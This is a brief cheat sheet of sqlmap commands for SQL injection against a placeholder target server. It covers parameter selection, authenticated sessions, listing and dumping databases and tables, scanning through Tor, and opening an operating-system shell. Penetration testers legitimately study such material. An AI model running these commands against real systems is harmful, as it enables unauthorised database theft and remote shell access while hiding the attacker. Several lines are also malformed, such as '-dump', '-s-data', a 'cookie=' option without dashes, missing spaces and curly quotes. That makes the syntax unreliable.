Simple usage

sqlmap -u “http://target_server/”

Specify target DBMS to MySQL

sqlmap -u “http://target_server/” --dbms=mysql

Using a proxy

sqlmap -u “http://target_server/” --proxy=http://proxy_address:port

Specify param1 to exploit

sqlmap -u “http://target_server/param1=value1&param2=value2” -p param1

Use POST requests

sqlmap -u “http://target_server” --data=param1=value1&param2=value2

Access with authenticated session

sqlmap -u “http://target_server” --data=param1=value1&param2=value2 -p param1 cookie=’my_cookie_value’

Basic authentication

sqlmap -u “http://target_server” -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password

Evaluating response strings

sqlmap -u “http://target_server/” --string=”This string if query is TRUE”

sqlmap -u “http://target_server/” --not-string=”This string if query is FALSE”

List databases

sqlmap -u “http://target_server/” --dbs

List tables of database target_DB

sqlmap -u “http://target_server/” -D target_DB --tables

Dump table target_Table of database target_DB

sqlmap -u “http://target_server/” -D target_DB -T target_Table -dump

List columns of table target_Table of database target_DB

sqlmap -u “http://target_server/” -D target_DB -T target_Table --columns

Scan through TOR

sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5

Get OS Shell

sqlmap -u “http://target_server/” --os-shell

(making collection)